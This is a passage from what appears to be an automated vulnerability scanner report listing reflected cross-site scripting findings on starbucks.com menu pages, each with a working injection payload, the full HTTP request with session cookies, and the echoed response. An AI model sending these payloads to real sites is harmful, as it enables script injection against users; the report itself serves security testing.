This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-brown-sugar?e9dc0"style%3d"x%3aexpression(alert(1))"2675c27b610=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:15 GMT
Connection: close
Content-Length: 41085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar?e9dc0"style="x:expression(alert(1))"2675c27b610=1"/>
...[SNIP]...

1.866. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-dried-fruit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5905"style%3d"x%3aexpression(alert(1))"78a9793c5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5905"style="x:expression(alert(1))"78a9793c5f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-dried-fruit?b5905"style%3d"x%3aexpression(alert(1))"78a9793c5f2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:09 GMT
Connection: close
Content-Length: 41314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit?b5905"style="x:expression(alert(1))"78a9793c5f2=1"/>
...[SNIP]...

1.867. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-mixed-nuts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5a1"style%3d"x%3aexpression(alert(1))"e5e65ed367b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa5a1"style="x:expression(alert(1))"e5e65ed367b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style%3d"x%3aexpression(alert(1))"e5e65ed367b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:12 GMT
Connection: close
Content-Length: 41158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style="x:expression(alert(1))"e5e65ed367b=1"/>
...[SNIP]...

1.868. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3953"style="x:expression(alert(1))"8dd8c6a876f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:39 GMT
Connection: close
Content-Length: 42959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style="x:expression(alert(1))"8dd8c6a876f=1"/>
...[SNIP]...

1.869. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71082"style="x:expression(alert(1))"22e1f1319e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:18 GMT
Connection: close
Content-Length: 42422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style="x:expression(alert(1))"22e1f1319e2=1"/>
...[SNIP]...

1.870. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/starbucks-perfect-oatmeal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9099b"style="x:expression(alert(1))"fe560f2ff1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:18 GMT
Connection: close
Content-Length: 41848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style="x:expression(alert(1))"fe560f2ff1f=1"/>
...[SNIP]...

1.871. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a962"style%3d"x%3aexpression(alert(1))"b0910c44384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a962"style="x:expression(alert(1))"b0910c44384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style%3d"x%3aexpression(alert(1))"b0910c44384=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:52 GMT
Connection: close
Content-Length: 42550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style="x:expression(alert(1))"b0910c44384=1"/>
...[SNIP]...

1.872. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/caramel-macchiato-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df808"style%3d"x%3aexpression(alert(1))"d48af3670c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df808"style="x:expression(alert(1))"d48af3670c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style%3d"x%3aexpression(alert(1))"d48af3670c3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:49 GMT
Connection: close
Content-Length: 38909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style="x:expression(alert(1))"d48af3670c3=1"/>
...[SNIP]...

1.873. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/coffee-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4981d"style%3d"x%3aexpression(alert(1))"713a0269255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4981d"style="x:expression(alert(1))"713a0269255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/coffee-ice-cream?4981d"style%3d"x%3aexpression(alert(1))"713a0269255=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:17 GMT
Connection: close
Content-Length: 38702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream?4981d"style="x:expression(alert(1))"713a0269255=1"/>
...[SNIP]...

1.874. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/java-chip-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9c8a"style="x:expression(alert(1))"a6fb88be708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:21 GMT
Connection: close
Content-Length: 38920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style="x:expression(alert(1))"a6fb88be708=1"/>
...[SNIP]...

1.875. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/mocha-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 257c5"style%3d"x%3aexpression(alert(1))"1c951768a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 257c5"style="x:expression(alert(1))"1c951768a35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style%3d"x%3aexpression(alert(1))"1c951768a35=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:07 GMT
Connection: close
Content-Length: 38836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style="x:expression(alert(1))"1c951768a35=1"/>
...[SNIP]...

1.876. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/peppermint-mocha-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e9f1"style="x:expression(alert(1))"4d62ee870d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:37 GMT
Connection: close
Content-Length: 38833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style="x:expression(alert(1))"4d62ee870d0=1"/>
...[SNIP]...

1.877. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/signature-hot-chocolate-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0a4d"style="x:expression(alert(1))"9e96fe99df4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/signature-hot-chocolate-ice-cream?f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:25 GMT
Connection: close
Content-Length: 38968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream?f0a4d"style="x:expression(alert(1))"9e96fe99df4=1"/>
...[SNIP]...

1.878. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d87ac"style%3d"x%3aexpression(alert(1))"de1edf0e094 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d87ac"style="x:expression(alert(1))"de1edf0e094 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream?d87ac"style%3d"x%3aexpression(alert(1))"de1edf0e094=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:34 GMT
Connection: close
Content-Length: 39107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
